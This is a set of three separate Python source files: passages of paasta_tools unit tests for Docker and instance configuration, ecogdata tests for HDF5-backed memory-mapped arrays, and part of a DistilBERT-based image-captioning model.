expected = "{}red{}blue{}red{}".format(
utils.PaastaColors.RED,
utils.PaastaColors.BLUE,
utils.PaastaColors.DEFAULT + utils.PaastaColors.RED,
utils.PaastaColors.DEFAULT,
)
actual = utils.PaastaColors.color_text(utils.PaastaColors.RED, "red%sred" % utils.PaastaColors.blue("blue"))
assert actual == expected
def test_DeploymentsJson_read():
file_mock = mock.mock_open()
fake_dir = '/var/dir_of_fake'
fake_path = '/var/dir_of_fake/fake_service/deployments.json'
fake_json = {
'v1': {
'no_srv:blaster': {
'docker_image': 'test_rocker:9.9',
'desired_state': 'start',
'force_bounce': None,
},
'dont_care:about': {
'docker_image': 'this:guy',
'desired_state': 'stop',
'force_bounce': '12345',
},
},
}
with mock.patch(
'builtins.open', file_mock, autospec=None,
) as open_patch, mock.patch(
'json.load', autospec=True, return_value=fake_json,
) as json_patch, mock.patch(
'paasta_tools.utils.os.path.isfile', autospec=True, return_value=True,
):
actual = utils.load_deployments_json('fake_service', fake_dir)
open_patch.assert_called_once_with(fake_path)
json_patch.assert_called_once_with(file_mock.return_value.__enter__.return_value)
assert actual == utils.DeploymentsJsonV1(fake_json['v1'])
def test_get_running_mesos_docker_containers():
fake_container_data = [
{
"Status": "Up 2 hours",
"Names": ['/mesos-legit.e1ad42eb-3ed7-4c9b-8711-aff017ef55a5'],
"Id": "05698f4156c4f30c8dcd747f7724b14c9af7771c9a4b96fdd6aa37d6419a12a3",
},
{
"Status": "Up 3 days",
"Names": ['/definitely_not_meeeeesos-.6d2fb3aa-2fef-4f98-8fed-df291481e91f'],
"Id": "ae66e2c3fe3c4b2a7444212592afea5cc6a4d8ca70ee595036b19949e00a257c",
},
]
with mock.patch("paasta_tools.utils.get_docker_client", autospec=True) as mock_docker:
docker_client = mock_docker.return_value
docker_client.containers.return_value = fake_container_data
assert len(utils.get_running_mesos_docker_containers()) == 1
def test_run_cancels_timer_thread_on_keyboard_interrupt():
mock_process = mock.Mock()
mock_timer_object = mock.Mock()
with mock.patch(
'paasta_tools.utils.Popen', autospec=True, return_value=mock_process,
), mock.patch(
'paasta_tools.utils.threading.Timer', autospec=True, return_value=mock_timer_object,
):
mock_process.stdout.readline.side_effect = KeyboardInterrupt
with raises(KeyboardInterrupt):
utils._run('sh echo foo', timeout=10)
assert mock_timer_object.cancel.call_count == 1
def test_run_returns_when_popen_fails():
fake_exception = OSError(1234, 'fake error')
with mock.patch('paasta_tools.utils.Popen', autospec=True, side_effect=fake_exception):
return_code, output = utils._run('nonexistant command', timeout=10)
assert return_code == 1234
assert 'fake error' in output
@pytest.mark.parametrize(
('dcts', 'expected'),
(
(
[{'a': 'b'}, {'c': 'd'}],
[{'a': 'b'}, {'c': 'd'}],
),
(
[{'c': 'd'}, {'a': 'b'}],
[{'a': 'b'}, {'c': 'd'}],
),
(
[{'a': 'b', 'c': 'd'}, {'a': 'b'}],
[{'a': 'b'}, {'a': 'b', 'c': 'd'}],
),
),
)
def test_sort_dcts(dcts, expected):
assert utils.sort_dicts(dcts) == expected
class TestInstanceConfig:
def test_get_monitoring(self):
fake_info = {'fake_key': 'fake_value'}
assert utils.InstanceConfig(
service='',
cluster='',
instance='',
config_dict={'monitoring': fake_info},
branch_dict=None,
).get_monitoring() == fake_info
def test_get_cpus_in_config(self):
fake_conf = utils.InstanceConfig(
service='',
cluster='',
instance='',
config_dict={'cpus': -5},
branch_dict=None,
)
assert fake_conf.get_cpus() == -5
def test_get_cpus_in_config_float(self):
fake_conf = utils.InstanceConfig(
service='',
cluster='',
instance='',
config_dict={'cpus': .66},
branch_dict=None,
)
assert fake_conf.get_cpus() == .66
def test_get_cpus_default(self):
fake_conf = utils.InstanceConfig(
service='',
cluster='',
instance='',
config_dict={},
branch_dict=None,
)
assert fake_conf.get_cpus() == .25
def test_get_mem_in_config(self):
fake_conf = utils.InstanceConfig(
service='',
instance='',
cluster='',
config_dict={'mem': -999},
branch_dict=None,
)
assert fake_conf.get_mem() == -999
def test_get_mem_default(self):
fake_conf = utils.InstanceConfig(
service='',
instance='',
cluster='',
config_dict={},
branch_dict=None,
)
assert fake_conf.get_mem() == 1024
def test_zero_cpu_burst(self):
fake_conf = utils.InstanceConfig(
service='fake_name',
cluster='',
instance='fake_instance',
config_dict={'cpu_burst_pct': 0, 'cpus': 1},
branch_dict=None,
)
assert fake_conf.get_cpu_quota() == 100000
def test_format_docker_parameters_default(self):
fake_conf = utils.InstanceConfig(
service='fake_name',
cluster='',
instance='fake_instance',
config_dict={
'cpus': 1,
'mem': 1024,
},
branch_dict=None,
)
assert fake_conf.format_docker_parameters() == [
{"key": "memory-swap", "value": '1088m'},
{"key": "cpu-period", "value": "100000"},
{"key": "cpu-quota", "value": "1000000"},
{"key": "label", "value": "paasta_service=fake_name"},
{"key": "label", "value": "paasta_instance=fake_instance"},
]
def test_format_docker_parameters_non_default(self):
fake_conf = utils.InstanceConfig(
service='fake_name',
cluster='',
instance='fake_instance',
config_dict={
'cpu_burst_pct': 200,
'cfs_period_us': 200000,
'cpus': 1,
'mem': 1024,
'ulimit': {
'nofile': {'soft': 1024, 'hard': 2048},
'nice': {'soft': 20},
},
'cap_add': ['IPC_LOCK', 'SYS_PTRACE'],
},
branch_dict=None,
)
assert fake_conf.format_docker_parameters() == [
{"key": "memory-swap", "value": '1088m'},
{"key": "cpu-period", "value": "200000"},
{"key": "cpu-quota", "value": "600000"},
{"key": "label", "value": "paasta_service=fake_name"},
{"key": "label", "value": "paasta_instance=fake_instance"},
{"key": "ulimit", "value": "nice=20"},
{"key": "ulimit", "value": "nofile=1024:2048"},
{"key": "cap-add", "value": "IPC_LOCK"},
{"key": "cap-add", "value": "SYS_PTRACE"},
]
def test_full_cpu_burst(self):
fake_conf = utils.InstanceConfig(
service='fake_name',
cluster='',
instance='fake_instance',
config_dict={'cpu_burst_pct': 100, 'cpus': 1},
branch_dict=None,
)
assert fake_conf.get_cpu_quota() == 200000
def test_get_mem_swap_int(self):
fake_conf = utils.InstanceConfig(
service='',
instance='',
cluster='',
config_dict={
'mem': 50,
},
branch_dict=None,
)
assert fake_conf.get_mem_swap() == "114m"
def test_get_mem_swap_float_rounds_up(self):
fake_conf = utils.InstanceConfig(
service='',
instance='',
cluster='',
config_dict={
'mem': 50.4,
},
branch_dict=None,
)
assert fake_conf.get_mem_swap() == "115m"
def test_get_disk_in_config(self):
fake_conf = utils.InstanceConfig(
service='',
instance='',
cluster='',
config_dict={'disk': -999},
branch_dict=None,
)
assert fake_conf.get_disk() == -999
def test_get_disk_default(self):
fake_conf = utils.InstanceConfig(
service='',
instance='',
cluster='',
config_dict={},
branch_dict=None,
)
assert fake_conf.get_disk() == 1024
def test_get_gpus_in_config(self):
fake_conf = utils.InstanceConfig(
service='',
instance='',
cluster='',
config_dict={'gpus': -123},
branch_dict=None,
)
assert fake_conf.get_gpus() == -123
def test_get_gpus_default(self):
fake_conf = utils.InstanceConfig(
service='',
instance='',
cluster='',
config_dict={},
branch_dict=None,
)
assert fake_conf.get_gpus() == 0
def test_get_ulimit_in_config(self):
fake_conf = utils.InstanceConfig(
service='',
instance='',
cluster='',
config_dict={
'ulimit': {
'nofile': {'soft': 1024, 'hard': 2048},
'nice': {'soft': 20},
},
},
branch_dict=None,
)
assert list(fake_conf.get_ulimit()) == [
{"key": "ulimit", "value": "nice=20"},
{"key": "ulimit", "value": "nofile=1024:2048"},
]
def test_get_ulimit_default(self):
fake_conf = utils.InstanceConfig(
service='',
instance='',
cluster='',
config_dict={},
branch_dict=None,
)
assert list(fake_conf.get_ulimit()) == []
def test_get_cap_add_in_config(self):
fake_conf = utils.InstanceConfig(
service='',
instance='',
cluster='',
config_dict={
'cap_add': ['IPC_LOCK', 'SYS_PTRACE'],
},
branch_dict=None,
)
assert list(fake_conf.get_cap_add()) == [
{"key": "cap-add", "value": "IPC_LOCK"},
{"key": "cap-add", "value": "SYS_PTRACE"},
]
def test_get_cap_add_default(self):
fake_conf = utils.InstanceConfig(
service='',
instance='',
cluster='',
config_dict={},
branch_dict=None,
)
assert list(fake_conf.get_cap_add()) == []
def test_deploy_group_default(self):
fake_conf = utils.InstanceConfig(
service='',
instance='fake_instance',
cluster='fake_cluster',
config_dict={},
branch_dict=None,
)
assert fake_conf.get_deploy_group() == 'fake_cluster.fake_instance'
def test_deploy_group_if_config(self):
fake_conf = utils.InstanceConfig(
service='',
instance='',
cluster='',
config_dict={'deploy_group': 'fake_deploy_group'},
branch_dict=None,
)
assert fake_conf.get_deploy_group() == 'fake_deploy_group'
def test_deploy_group_string_interpolation(self):
fake_conf = utils.InstanceConfig(
service='',
instance='',
cluster='fake_cluster',
config_dict={'deploy_group': 'cluster_is_{cluster}'},
branch_dict=None,
)
assert fake_conf.get_deploy_group() == 'cluster_is_fake_cluster'
def test_get_cmd_default(self):
fake_conf = utils.InstanceConfig(
service='',
cluster='',
instance='',
config_dict={},
branch_dict=None,
)
assert fake_conf.get_cmd() is None
| |
<reponame>miketrumpis/ecogdata<gh_stars>0
import os
import pytest
import numpy as np
from ecogdata.datasource.array_abstractions import HDF5Buffer
from ecogdata.datasource.memmap import MappedSource, MemoryBlowOutError
from ecogdata.datasource.basic import PlainArraySource
from .test_array_abstractions import _create_hdf5, _create_buffer, _create_binder
def test_basic_construction():
aux_arrays = ('test1', 'test2')
buffer, data = _create_buffer(aux_arrays=aux_arrays)
# hacky way to get h5py.File object...
hdf = buffer.file_array.file
aligned = dict([(k, HDF5Buffer(hdf[k])) for k in aux_arrays])
map_source = MappedSource(buffer, aligned_arrays=aligned)
shape = data.shape
assert map_source.shape == shape, 'Shape wrong'
assert map_source.binary_channel_mask.sum() == shape[0], 'Wrong number of active channels'
for field in aux_arrays:
assert hasattr(map_source, field), 'Aux field {} not preserved'.format(field)
assert getattr(map_source, field).shape[1] == shape[1], 'aligned field {} wrong length'.format(field)
# repeat for transpose
map_source = MappedSource(buffer, aligned_arrays=aligned, transpose=True)
assert map_source.shape == shape[::-1], 'Shape wrong in transpose'
assert map_source.binary_channel_mask.sum() == shape[1], 'Wrong number of active channels in transpose'
def test_basic_construction_binder():
buffer, data = _create_binder(axis=1)
map_source = MappedSource(buffer)
shape = data.shape
assert map_source.shape == shape, 'Shape wrong'
assert map_source.binary_channel_mask.sum() == shape[0], 'Wrong number of active channels'
# repeat for transpose
map_source = MappedSource(buffer, transpose=True)
assert map_source.shape == shape[::-1], 'Shape wrong in transpose'
assert map_source.binary_channel_mask.sum() == shape[1], 'Wrong number of active channels in transpose'
def test_construction_from_single_source():
aux_arrays = ('test1', 'test2')
f = _create_hdf5(aux_arrays=aux_arrays)
shape = f['data'].shape
map_source = MappedSource.from_hdf_sources(f, 'data', aligned_arrays=aux_arrays)
assert map_source.shape == shape, 'Shape wrong'
assert map_source.binary_channel_mask.sum() == shape[0], 'Wrong number of active channels'
for field in aux_arrays:
assert hasattr(map_source, field), 'Aux field {} not preserved'.format(field)
assert getattr(map_source, field).shape[1] == shape[1], 'aligned field {} wrong length'.format(field)
# repeat for transpose
map_source = MappedSource.from_hdf_sources(f, 'data', aligned_arrays=aux_arrays, transpose=True)
assert map_source.shape == shape[::-1], 'Shape wrong in transpose'
assert map_source.binary_channel_mask.sum() == shape[1], 'Wrong number of active channels in transpose'
def test_construction_from_sources():
aux_arrays = ('test1', 'test2')
files = [_create_hdf5(aux_arrays=aux_arrays) for i in range(3)]
shape = files[0]['data'].shape
shape = (shape[0], 3 * shape[1])
map_source = MappedSource.from_hdf_sources(files, 'data', aligned_arrays=aux_arrays)
assert map_source.shape == shape, 'Shape wrong'
assert map_source.binary_channel_mask.sum() == shape[0], 'Wrong number of active channels'
for field in aux_arrays:
assert hasattr(map_source, field), 'Aux field {} not preserved'.format(field)
assert getattr(map_source, field).shape[1] == shape[1], 'aligned field {} wrong length'.format(field)
# repeat for transpose: now sources are stacked on axis=0, but the resulting shape is transposed per vector
# timeseries convention (channels X samples)
shape = files[0]['data'].shape
shape = (shape[0] * 3, shape[1])
map_source = MappedSource.from_hdf_sources(files, 'data', aligned_arrays=aux_arrays, transpose=True)
assert map_source.shape == shape[::-1], 'Shape wrong in transpose'
assert map_source.binary_channel_mask.sum() == shape[1], 'Wrong number of active channels in transpose'
for field in aux_arrays:
assert hasattr(map_source, field), 'Aux field {} not preserved'.format(field)
assert getattr(map_source, field).shape[0] == shape[0], 'aligned field {} wrong length'.format(field)
def test_joining():
aux_arrays = ('test1', 'test2')
files = [_create_hdf5(aux_arrays=aux_arrays) for i in range(3)]
map_source1 = MappedSource.from_hdf_sources(files, 'data', aligned_arrays=aux_arrays)
next_file = _create_hdf5(aux_arrays=aux_arrays)
map_source2 = MappedSource.from_hdf_sources(next_file, 'data', aligned_arrays=aux_arrays)
full_map = map_source1.join(map_source2)
assert full_map.shape == (len(map_source1), map_source1.shape[1] + map_source2.shape[1]), 'binder to buffer appending failed'
full_map = map_source2.join(map_source1)
assert full_map.shape == (len(map_source1), map_source1.shape[1] + map_source2.shape[1]), 'buffer to binder appending failed'
def test_joiningT():
aux_arrays = ('test1', 'test2')
files = [_create_hdf5(aux_arrays=aux_arrays) for i in range(3)]
map_source1 = MappedSource.from_hdf_sources(files, 'data', aligned_arrays=aux_arrays, transpose=True)
next_file = _create_hdf5(aux_arrays=aux_arrays)
map_source2 = MappedSource.from_hdf_sources(next_file, 'data', aligned_arrays=aux_arrays, transpose=True)
full_map = map_source1.join(map_source2)
assert full_map.shape == (len(map_source1), map_source1.shape[1] + map_source2.shape[1]), 'binder to buffer appending failed'
full_map = map_source2.join(map_source1)
assert full_map.shape == (len(map_source1), map_source1.shape[1] + map_source2.shape[1]), 'buffer to binder appending failed'
def test_direct_mapped():
f = _create_hdf5()
mapped_source = MappedSource.from_hdf_sources(f, 'data')
assert mapped_source.is_direct_map, 'direct map should be true'
mapped_source = MappedSource.from_hdf_sources(f, 'data', electrode_channels=range(4))
assert not mapped_source.is_direct_map, 'direct map should be false'
# for transposed disk arrays
f = _create_hdf5(transpose=True)
mapped_source = MappedSource.from_hdf_sources(f, 'data', transpose=True)
assert mapped_source.is_direct_map, 'direct map should be true'
mapped_source = MappedSource.from_hdf_sources(f, 'data', transpose=True, electrode_channels=range(4))
assert not mapped_source.is_direct_map, 'direct map should be false'
def test_scaling():
f = _create_hdf5()
float_data = f['data'][:, 500:1000].astype('d')
map_source = MappedSource.from_hdf_sources(f, 'data', units_scale=2.0)
assert np.all(map_source[:, 500:1000] == float_data * 2).all(), 'scalar scaling wrong'
map_source = MappedSource.from_hdf_sources(f, 'data', units_scale=(-100, 2.0))
assert np.all(map_source[:, 500:1000] == (float_data - 100) * 2).all(), 'affine scaling wrong'
def test_electrode_subset():
f = _create_hdf5()
electrode_channels = [2, 4, 6, 8]
map_source = MappedSource.from_hdf_sources(f, 'data', electrode_channels=electrode_channels)
data = f['data'][:, :][electrode_channels]
assert np.all(data[:, 100:200] == map_source[:, 100:200]), 'electrode subset failed'
def test_electrode_subsetT():
f = _create_hdf5(transpose=True)
electrode_channels = [2, 4, 6, 8]
map_source = MappedSource.from_hdf_sources(f, 'data', electrode_channels=electrode_channels, transpose=True)
data = f['data'][:, :][:, electrode_channels].T
assert np.all(data[:, 100:200] == map_source[:, 100:200]), 'electrode subset failed in transpose'
def test_channel_map():
f = _create_hdf5()
electrode_channels = list(range(10))
binary_mask = np.ones(10, '?')
binary_mask[:5] = False
# so channels 5, 6, 7, 8, 9 should be active
map_source = MappedSource.from_hdf_sources(f, 'data', electrode_channels=electrode_channels)
map_source.set_channel_mask(binary_mask)
assert (map_source.binary_channel_mask == binary_mask).all(), 'binary mask wrong'
data = f['data'][:, :][electrode_channels, :]
assert np.all(data[5:, 100:200] == map_source[:, 100:200]), 'channel masking failed'
# unmask
map_source.set_channel_mask(None)
binary_mask[:] = True
assert (map_source.binary_channel_mask == binary_mask).all(), 'binary mask wrong'
data = f['data'][:, :][electrode_channels, :]
assert np.all(data[:, 100:200] == map_source[:, 100:200]), 'channel masking failed'
def test_channel_mapT():
f = _create_hdf5(transpose=True)
electrode_channels = list(range(10))
binary_mask = np.ones(10, '?')
binary_mask[:5] = False
# so channels 5, 6, 7, 8, 9 should be active
map_source = MappedSource.from_hdf_sources(f, 'data', electrode_channels=electrode_channels, transpose=True)
map_source.set_channel_mask(binary_mask)
assert (map_source.binary_channel_mask == binary_mask).all(), 'binary mask wrong in transpose'
data = f['data'][:, :][:, electrode_channels].T
assert np.all(data[5:, 100:200] == map_source[:, 100:200]), 'channel masking failed in transpose'
# unmask
map_source.set_channel_mask(None)
binary_mask[:] = True
assert (map_source.binary_channel_mask == binary_mask).all(), 'binary mask wrong'
data = f['data'][:, :][:, electrode_channels].T
assert np.all(data[:, 100:200] == map_source[:, 100:200]), 'channel masking failed'
def test_channel_slicing():
f = _create_hdf5()
electrode_channels = list(range(6, 17))
map_source = MappedSource.from_hdf_sources(f, 'data', electrode_channels=electrode_channels, units_scale=5.0)
data_first_channels = map_source[:3, :]
with map_source.channels_are_maps(True):
first_channels = map_source[:3]
assert isinstance(first_channels, MappedSource), 'slice did not return new map'
assert np.array_equal(data_first_channels, first_channels[:, :]), 'new map data mis-mapped'
first_channels = map_source[:3]
assert isinstance(first_channels, np.ndarray), 'slice-as-array failed'
assert np.array_equal(data_first_channels, first_channels), 'slice-as-array wrong data'
def test_channel_slicingT():
f = _create_hdf5(transpose=True)
electrode_channels = list(range(6, 17))
map_source = MappedSource.from_hdf_sources(f, 'data', electrode_channels=electrode_channels, transpose=True, units_scale=5.0)
data_first_channels = map_source[:3, :]
with map_source.channels_are_maps(True):
first_channels = map_source[:3]
assert isinstance(first_channels, MappedSource), 'slice did not return new map'
assert np.array_equal(data_first_channels, first_channels[:, :]), 'new map data mis-mapped'
first_channels = map_source[:3]
assert isinstance(first_channels, np.ndarray), 'slice-as-array failed'
assert np.array_equal(data_first_channels, first_channels), 'slice-as-array wrong data'
def test_channel_slicing_with_mask():
f = _create_hdf5()
electrode_channels = list(range(6, 17))
map_source = MappedSource.from_hdf_sources(f, 'data', electrode_channels=electrode_channels)
mask = map_source.binary_channel_mask
mask[:5] = False
map_source.set_channel_mask(mask)
data_first_channels = map_source[:3, :]
with map_source.channels_are_maps(True):
first_channels = map_source[:3]
assert isinstance(first_channels, MappedSource), 'slice did not return new map'
assert np.array_equal(data_first_channels, first_channels[:, :]), 'new map data mis-mapped'
first_channels = map_source[:3]
assert isinstance(first_channels, np.ndarray), 'slice-as-array failed'
assert np.array_equal(data_first_channels, first_channels), 'slice-as-array wrong data'
def test_big_slicing_exception():
import ecogdata.expconfig.global_config as globalconfig
f = _create_hdf5()
data = f['data']
globalconfig.OVERRIDE['memory_limit'] = data.size * data.dtype.itemsize / 2.0
map_source = MappedSource.from_hdf_sources(f, 'data')
with pytest.raises(MemoryBlowOutError):
try:
map_source[:, :]
except Exception as e:
raise e
finally:
globalconfig.OVERRIDE.pop('memory_limit')
def test_big_slicing_allowed():
import ecogdata.expconfig.global_config as globalconfig
f = _create_hdf5()
data = f['data']
globalconfig.OVERRIDE['memory_limit'] = data.size * data.dtype.itemsize / 2.0
map_source = MappedSource.from_hdf_sources(f, 'data')
try:
with map_source.big_slices(True):
_ = map_source[:, :]
except MemoryBlowOutError as e:
assert False, 'Big slicing context failed'
finally:
globalconfig.OVERRIDE.pop('memory_limit')
def test_big_slicing_allowed_always():
import ecogdata.expconfig.global_config as globalconfig
f = _create_hdf5()
data = f['data']
globalconfig.OVERRIDE['memory_limit'] = data.size * data.dtype.itemsize / 2.0
map_source = MappedSource.from_hdf_sources(f, 'data', raise_on_big_slice=False)
try:
_ = map_source[:, :]
except MemoryBlowOutError as e:
assert False, 'Big slicing context failed'
finally:
globalconfig.OVERRIDE.pop('memory_limit')
def test_write():
f = _create_hdf5()
electrode_channels = list(range(10))
binary_mask = np.ones(10, '?')
binary_mask[:5] = False
# so channels 5, 6, 7, 8, 9 should be active
map_source = MappedSource.from_hdf_sources(f, 'data', electrode_channels=electrode_channels)
shp = map_source.shape
rand_pattern = np.random.randint(0, 100, size=(2, shp[1]))
map_source[:2] = rand_pattern
# use full-slice syntax to get data
assert np.array_equal(map_source[:2, :], rand_pattern), 'write failed (map subset)'
map_source.set_channel_mask(binary_mask)
# write again
map_source[:2] = rand_pattern
assert np.array_equal(map_source[:2, :], rand_pattern), 'write failed (map subset and mask)'
def test_write_to_binder():
files = [_create_hdf5() for i in range(3)]
electrode_channels = list(range(10))
binary_mask = np.ones(10, '?')
binary_mask[:5] = False
# so channels 5, 6, 7, 8, 9 should be active
map_source = MappedSource.from_hdf_sources(files, 'data', electrode_channels=electrode_channels)
# make a write that spans buffers
single_length = files[0]['data'].shape[1]
rand_pattern = np.random.randint(0, 100, size=(2, 205))
sl = np.s_[:2, single_length - 100: single_length + 105]
map_source[sl] = rand_pattern
# use full-slice syntax to get data
assert np.array_equal(map_source[sl], rand_pattern), 'write failed to binder (map subset)'
map_source.set_channel_mask(binary_mask)
# write again
map_source[sl] = rand_pattern
| |
<gh_stars>0
# Copyright (c) 2020 Microsoft Corporation. Licensed under the MIT license.
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import math
import torch
from torch import nn
import torch.nn.functional as F
from torch.nn import CrossEntropyLoss, MSELoss
from transformers.modeling_bert import (
BertPredictionHeadTransform)
from transformers.modeling_distilbert import (
Embeddings, TransformerBlock, Transformer,
DistilBertModel, FFN)
from transformers.modeling_utils import (
apply_chunking_to_forward,
find_pruneable_heads_and_indices,
prune_linear_layer,
)
from transformers.modeling_outputs import (
BaseModelOutput,
MaskedLMOutput,
MultipleChoiceModelOutput,
QuestionAnsweringModelOutput,
SequenceClassifierOutput,
TokenClassifierOutput,
)
from .modeling_utils import CaptionPreTrainedModel
from ..utils.cbs import ConstrainedBeamSearch, select_best_beam_with_constraints
import copy
logger = logging.getLogger(__name__)
class MultiHeadSelfAttention(nn.Module):
def __init__(self, config):
super().__init__()
self.n_heads = config.n_heads
self.dim = config.dim
self.dropout = nn.Dropout(p=config.attention_dropout)
assert self.dim % self.n_heads == 0
self.q_lin = nn.Linear(in_features=config.dim, out_features=config.dim)
self.k_lin = nn.Linear(in_features=config.dim, out_features=config.dim)
self.v_lin = nn.Linear(in_features=config.dim, out_features=config.dim)
self.out_lin = nn.Linear(in_features=config.dim, out_features=config.dim)
self.pruned_heads = set()
def prune_heads(self, heads):
attention_head_size = self.dim // self.n_heads
if len(heads) == 0:
return
heads, index = find_pruneable_heads_and_indices(heads, self.n_heads, attention_head_size, self.pruned_heads)
# Prune linear layers
self.q_lin = prune_linear_layer(self.q_lin, index)
self.k_lin = prune_linear_layer(self.k_lin, index)
self.v_lin = prune_linear_layer(self.v_lin, index)
self.out_lin = prune_linear_layer(self.out_lin, index, dim=1)
# Update hyper params
self.n_heads = self.n_heads - len(heads)
self.dim = attention_head_size * self.n_heads
self.pruned_heads = self.pruned_heads.union(heads)
def forward(self, query, key, value, mask, head_mask=None, output_attentions=False):
"""
Parameters:
query: torch.tensor(bs, seq_length, dim)
key: torch.tensor(bs, seq_length, dim)
value: torch.tensor(bs, seq_length, dim)
mask: torch.tensor(bs, 1, seq_length, seq_length)
Returns:
weights: torch.tensor(bs, n_heads, seq_length, seq_length) Attention weights context: torch.tensor(bs,
seq_length, dim) Contextualized layer. Optional: only if `output_attentions=True`
"""
bs, q_length, dim = query.size()
k_length = key.size(1)
# assert dim == self.dim, 'Dimensions do not match: %s input vs %s configured' % (dim, self.dim)
# assert key.size() == value.size()
dim_per_head = self.dim // self.n_heads
def shape(x):
""" separate heads """
return x.view(bs, -1, self.n_heads, dim_per_head).transpose(1, 2)
def unshape(x):
""" group heads """
return x.transpose(1, 2).contiguous().view(bs, -1, self.n_heads * dim_per_head)
q = shape(self.q_lin(query)) # (bs, n_heads, q_length, dim_per_head)
k = shape(self.k_lin(key)) # (bs, n_heads, k_length, dim_per_head)
v = shape(self.v_lin(value)) # (bs, n_heads, k_length, dim_per_head)
q = q / math.sqrt(dim_per_head) # (bs, n_heads, q_length, dim_per_head)
scores = torch.matmul(q, k.transpose(2, 3)) # (bs, n_heads, q_length, k_length)
# since the mask has been processed externally, the following step of expanding the mask is omitted
mask = (mask == 0).expand_as(scores) # (bs, n_heads, q_length, k_length)
scores.masked_fill_(mask, -float("inf")) # (bs, n_heads, q_length, k_length)
weights = nn.Softmax(dim=-1)(scores) # (bs, n_heads, q_length, k_length)
weights = self.dropout(weights) # (bs, n_heads, q_length, k_length)
# Mask heads if we want to
if head_mask is not None:
weights = weights * head_mask
context = torch.matmul(weights, v) # (bs, n_heads, q_length, dim_per_head)
context = unshape(context) # (bs, q_length, dim)
context = self.out_lin(context) # (bs, q_length, dim)
if output_attentions:
return (context, weights)
else:
return (context,)
class CaptionTransformerBlock(TransformerBlock):
"""
Modified from TransformerBlock to add support for output_hidden_states.
"""
def __init__(self, config):
super().__init__(config)
assert config.dim % config.n_heads == 0
self.attention = MultiHeadSelfAttention(config)
self.sa_layer_norm = nn.LayerNorm(normalized_shape=config.dim, eps=1e-12)
self.ffn = FFN(config)
self.output_layer_norm = nn.LayerNorm(normalized_shape=config.dim, eps=1e-12)
def forward(self, x, attn_mask=None, head_mask=None, output_attentions=False, history_state=None):
"""
Parameters:
x: torch.tensor(bs, seq_length, dim)
attn_mask: torch.tensor(bs, seq_length)
history_state: torch.tensor(bs, seq_length, dim)
Returns:
sa_weights: torch.tensor(bs, n_heads, seq_length, seq_length) The attention weights ffn_output:
torch.tensor(bs, seq_length, dim) The output of the transformer block contextualization.
"""
# Self-Attention
if history_state is not None:
x_states = torch.cat([history_state, x], dim=1)
else: x_states = x
sa_output = self.attention(
query=x,
key=x_states,
value=x_states,
mask=attn_mask,
head_mask=head_mask,
output_attentions=output_attentions,
)
if output_attentions:
sa_output, sa_weights = sa_output # (bs, seq_length, dim), (bs, n_heads, seq_length, seq_length)
else: # To handle these `output_attentions` or `output_hidden_states` cases returning tuples
assert type(sa_output) == tuple
sa_output = sa_output[0]
sa_output = self.sa_layer_norm(sa_output + x) # (bs, seq_length, dim)
# Feed Forward Network
ffn_output = self.ffn(sa_output) # (bs, seq_length, dim)
ffn_output = self.output_layer_norm(ffn_output + sa_output) # (bs, seq_length, dim)
output = (ffn_output,)
if output_attentions:
output = (sa_weights,) + output
return output
class CaptionTransformer(Transformer):
"""
Modified from Transformer to add support for output_hidden_states.
"""
def __init__(self, config):
super().__init__(config)
self.n_layers = config.n_layers
layer = CaptionTransformerBlock(config)
self.layer = nn.ModuleList([copy.deepcopy(layer) for _ in range(config.n_layers)])
def forward(
self, x, attn_mask=None, head_mask=None, output_attentions=False, output_hidden_states=False,
return_dict=None, encoder_history_states=None
): # docstyle-ignore
"""
Parameters:
x: torch.tensor(bs, seq_length, dim) Input sequence embedded.
attn_mask: torch.tensor(bs, seq_length) Attention mask on the sequence.
Returns:
hidden_state: torch.tensor(bs, seq_length, dim) Sequence of hidden states in the last (top)
layer all_hidden_states: Tuple[torch.tensor(bs, seq_length, dim)]
Tuple of length n_layers with the hidden states from each layer.
Optional: only if output_hidden_states=True
all_attentions: Tuple[torch.tensor(bs, n_heads, seq_length, seq_length)]
Tuple of length n_layers with the attention weights from each layer
Optional: only if output_attentions=True
"""
all_hidden_states = () if output_hidden_states else None
all_attentions = () if output_attentions else None
hidden_state = x
for i, layer_module in enumerate(self.layer):
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_state,)
history_state = None if encoder_history_states is None else encoder_history_states[i]
layer_outputs = layer_module(
x=hidden_state, attn_mask=attn_mask, head_mask=head_mask[i], output_attentions=output_attentions,
history_state=history_state
)
hidden_state = layer_outputs[-1]
if output_attentions:
assert len(layer_outputs) == 2
attentions = layer_outputs[0]
all_attentions = all_attentions + (attentions,)
else:
assert len(layer_outputs) == 1
# Add last layer
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_state,)
if not return_dict:
return tuple(v for v in [hidden_state, all_hidden_states, all_attentions] if v is not None)
return BaseModelOutput(
last_hidden_state=hidden_state, hidden_states=all_hidden_states, attentions=all_attentions
)
class DistilBertImgModel(DistilBertModel):
""" Expand from BertModel to handle image region features as input
"""
def __init__(self, config):
super(DistilBertImgModel, self).__init__(config)
self.embeddings = Embeddings(config)
self.encoder = CaptionTransformer(config)
del self.transformer
self.img_dim = config.img_feature_dim
logger.info('BertImgModel Image Dimension: {}'.format(self.img_dim))
self.img_feature_type = config.img_feature_type
if hasattr(config, 'use_img_layernorm'):
self.use_img_layernorm = config.use_img_layernorm
else:
self.use_img_layernorm = None
if config.img_feature_type == 'dis_code':
self.code_embeddings = nn.Embedding(config.code_voc, config.code_dim, padding_idx=0)
self.img_embedding = nn.Linear(config.code_dim, self.config.hidden_size, bias=True)
elif config.img_feature_type == 'dis_code_t': # transpose
self.code_embeddings = nn.Embedding(config.code_voc, config.code_dim, padding_idx=0)
self.img_embedding = nn.Linear(config.code_size, self.config.hidden_size, bias=True)
elif config.img_feature_type == 'dis_code_scale': # scaled
self.input_embeddings = nn.Linear(config.code_dim, config.code_size, bias=True)
self.code_embeddings = nn.Embedding(config.code_voc, config.code_dim, padding_idx=0)
self.img_embedding = nn.Linear(config.code_dim, self.config.hidden_size, bias=True)
else:
self.img_embedding = nn.Linear(self.img_dim, self.config.hidden_size, bias=True)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
if self.use_img_layernorm:
self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.img_layer_norm_eps)
self.init_weights()
def get_input_embeddings(self):
return self.embeddings.word_embeddings
def set_input_embeddings(self, new_embeddings):
self.embeddings.word_embeddings = new_embeddings
def _prune_heads(self, heads_to_prune):
""" Prunes heads of the model.
heads_to_prune: dict of {layer_num: list of heads to prune in this layer}
See base class PreTrainedModel
"""
